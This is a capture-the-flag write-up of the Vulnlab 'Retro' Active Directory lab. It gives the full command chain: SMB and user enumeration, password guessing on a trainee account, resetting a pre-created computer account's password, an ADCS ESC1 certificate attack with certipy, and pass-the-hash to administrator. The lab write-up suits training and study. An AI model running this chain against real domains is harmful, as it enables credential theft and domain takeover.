# Vulnlab - Retro ## NMAP ```bash PORT STATE SERVICE VERSION 53/tcp open tcpwrapped 88/tcp open kerberos-sec Microsoft Windows Kerberos 135/tcp open tcpwrapped 139/tcp open tcpwrapped 445/tcp open tcpwrapped 593/tcp open tcpwrapped 636/tcp open tcpwrapped | ssl-cert: Subject: commonName=DC.retro.vl | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:DC.retro.vl | Issuer: commonName=retro-DC-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2023-07-23T21:06:31 | Not valid after: 2024-07-22T21:06:31 | MD5: c1f0bac716e071c2bcb943273d569612 |_SHA-1: 7f37ea6965982430f9180a65bcadde76add6fea6 3389/tcp open tcpwrapped | ssl-cert: Subject: commonName=DC.retro.vl | Issuer: commonName=DC.retro.vl | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2023-07-25T09:53:42 | Not valid after: 2024-01-24T09:53:42 | MD5: 89ccbcee0485b170bbd1ebee3de93784 |_SHA-1: 2bfca683288bc59e2d2f9ffe01775d871c8c272d 9389/tcp open tcpwrapped 49664/tcp open tcpwrapped 49672/tcp open tcpwrapped 49683/tcp open tcpwrapped 49708/tcp open tcpwrapped ``` On Enumerating SMB with null authentication we can find few shares

From the `Trainees` share, we'll get `Important.txt` which talks about having weak passwords on the trainees account and also mentions about bundling all of their account into one general `trainee` account

So verifying if the account is trainee through `kebrute` ```bash kerbrute userenum --dc 10.10.108.245 -d retro.vl user.txt ```

We could have figured this out without guessing as well through lookupsid.py from impacket with anonymous user ```bash lookupsid.py anonymous@10.10.99.152 -no-pass ```

Since this account has a weak password, we can try common things like password being trainee, verifying it through `crackmapexec` ```bash cme smb 10.10.99.152 -u 'trainee' -p 'trainee' --shares ```

We can now access `Notes` share and find a ToDo.txt file which talks about pre-created computer accounts

https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/ If we go back to the output of lookupsid, we'll see a computer account `BANKING$`

The password for this account is the same as the name, on trying to login, it will show `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`

In order to use this account, we need to change the password and this can be done through `kpasswd` which requires `/etc/krb.conf` to be modified

``` kpasswd BANKING$ ```

This can be verified again with cme that the password has been changed

Enumerating ADCS with `certipy` , we see that authenticated users have enrollment rights but there isn't any template which be used with trainee user

However checking the BANKING$ account, there's a template `RetroClients` on which domain computer have enrollment rights which can allow the machine accounts to enroll certificate on behalf of other users leading to ESC1 attack ```bash certipy find -u 'BANKING$' -p 'Pass' -dc-ip 10.10.99.152 -stdout -vulnerable ```

On requesting administrator's certificate, it's going to show an error that it doesn't meet the minimum key size which by default certipy sends with 2048 length

Specifying the key size to be of 4096 will resolve this issue ```bash certipy req -u 'banking$'@retro.vl -p 'P@ss12345' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator' -key-size 4096 ```

With this certificate, administrator's hash can be retrieved ```bash certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.99.152 ```

Through `evil-winrm` we can login on WinRM using the NThash of administrator

## References - https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/